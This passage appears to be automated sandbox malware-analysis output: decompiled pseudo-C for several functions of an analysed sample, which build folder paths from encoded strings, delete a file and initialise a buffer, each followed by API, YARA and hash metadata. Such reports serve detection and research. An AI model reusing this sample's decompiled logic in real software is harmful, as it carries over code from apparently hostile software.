                  				void* _t19;
                  
                  				if( *0x415f4c == 0) {
                  					E0040F227();
                  				} else {
                  					E0040F214();
                  				}
                  				E00401503(0x416840, 0x104);
                  				_t3 = E00401A52(0x412bb0, 0x4bf67e71);
                  				_t19 = _t3;
                  				 *0x4143a4(0x416840, 0x104, _t19, 0x416a48, 0x416530, _t15, _t18, _t7);
                  				_t10 = _t19;
                  				return HeapFree(GetProcessHeap(), 0, _t10);
                  			}










                  APIs
                  • _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F214: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,00416A48,0040F2A0,0040F94C,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: @hA$g8Cw
                  • API String ID: 3078599568-2636106944
                  • Opcode ID: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction ID: e972b69ea5731f996dd58b1a7c700a453acaa9277561cdf85d49239cb67cc4b6
                  • Opcode Fuzzy Hash: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction Fuzzy Hash: D4E022203000106BC2207286AC457FB114ACBC2399B2180BFF90AB62D2CA7D8C06C37E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 50%
                  			E0040F227() {
                  				void* _t3;
                  				void* _t8;
                  				void* _t10;
                  				void* _t13;
                  				void* _t14;
                  
                  				 *0x414c14(0, 0x1c, 0, 0, 0x416a48, _t10, _t13);
                  				_t3 = E00401A52(0x412df0, 0x4bf67e71);
                  				_t14 = _t3;
                  				 *0x4143a4(0x416a48, 0x104, _t14, 0x416a48, 0x416530);
                  				_t8 = _t14;
                  				return HeapFree(GetProcessHeap(), 0, _t8);
                  			}









                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: HjA$g8Cw
                  • API String ID: 3988819677-3647325788
                  • Opcode ID: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction ID: 86e21f4e142f409bbdd5896e6b5cbe9030aa6b7bc5bdc0fcc4a87da7cf4bd144
                  • Opcode Fuzzy Hash: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction Fuzzy Hash: 9FE0CD717401107BD31062656D09EF7695DDBD1FA1712403EBE0AE71D1E5748C41C27D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E004010DC(void* __eflags) {
                  				short _v524;
                  
                  				_t12 = E00401A52(0x412000, 0x7b38aa91);
                  				 *0x4143a4( &_v524, 0x104, _t3, 0x416840);
                  				L00401B09(_t12);
                  				return DeleteFileW( &_v524);
                  			}





                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile_snwprintf
                  • String ID: g8Cw
                  • API String ID: 366827715-3103284439
                  • Opcode ID: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction ID: 7ded67d4db3bd44581a8d62ce4f7b27048894e85998f6b6a93392d295cc14779
                  • Opcode Fuzzy Hash: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction Fuzzy Hash: E5E0DF31A0031867C711B7649C0AADB3A2C8B00315F0002B6E969A7292EE789A9487DE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 95%
                  			E0040499D(intOrPtr* __ecx, signed int _a8) {
                  				intOrPtr _t68;
                  				signed int _t80;
                  				signed int _t83;
                  				signed int _t84;
                  				int* _t85;
                  				void* _t86;
                  
                  				_t83 = _a8;
                  				_t85 = __ecx;
                  				asm("cdq");
                  				_t80 = 3;
                  				 *(__ecx + 8) = _t83;
                  				 *((intOrPtr*)(__ecx)) = 0;
                  				 *((intOrPtr*)(__ecx + 4)) = 0;
                  				 *((intOrPtr*)(__ecx + 0xc)) = ((_t83 & 0x00000fff) + 2) / _t80 + 1;
                  				 *(__ecx + 0x14) = _t83 >> 0x0000000e & 0x00000001;
                  				asm("cdq");
                  				 *((intOrPtr*)(__ecx + 0x10)) = ((_t83 >> 0x00000002 & 0x000003ff) + 2) / _t80 + 1;
                  				_t84 = _t83 & 0x00008000;
                  				if(_t84 == 0) {
                  					_t15 = _t85 + 0x29272; // 0x29272
                  					memset(_t15, 0, 0x10000);
                  					_t86 = _t86 + 0xc;
                  				}
                  				 *((intOrPtr*)(_t85 + 0x44)) = 0;
                  				_t17 = _t85 + 0x9273; // 0x9273
                  				 *((intOrPtr*)(_t85 + 0x28)) = _t17;
                  				_t19 = _t85 + 0x9272; // 0x9272
                  				 *((intOrPtr*)(_t85 + 0x2c)) = _t19;
                  				_t21 = _t85 + 0x39272; // 0x39272
                  				_t68 = _t21;
                  				 *((intOrPtr*)(_t85 + 0x40)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x3c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x24)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x20)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x1c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x68)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x48)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x64)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x60)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x5c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x58)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x38)) = 8;
                  				 *((intOrPtr*)(_t85 + 0x30)) = _t68;
                  				 *((intOrPtr*)(_t85 + 0x34)) = _t68;
                  				 *((intOrPtr*)(_t85 + 0x6c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x54)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x50)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x4c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x18)) = 1;
                  				 *((intOrPtr*)(_t85 + 0x70)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x74)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x78)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x7c)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x80)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x84)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x88)) = 0;
                  				 *((intOrPtr*)(_t85 + 0x8c)) = 0;
                  				if(_t84 == 0) {
                  					_t49 = _t85 + 0x90; // 0x90
                  					memset(_t49, 0, 0x8101);
                  					_t86 = _t86 + 0xc;
                  				}
                  				_t50 = _t85 + 0x8192; // 0x8192
                  				memset(_t50, 0, 0x240);
                  				_t51 = _t85 + 0x83d2; // 0x83d2
                  				memset(_t51, 0, 0x40);
                  				return 0;
                  			}










                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction ID: 70126d602587bd303643ef6f1a7dad0836f0adfd5b30951eb2e943be6850c986
                  • Opcode Fuzzy Hash: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction Fuzzy Hash: D141B2B2900B049FD320CF6AD885683FBE8FB48714B84893ED6DEC2A50D775B5448F54
                  Uniqueness

                  Uniqueness Score: 0.00%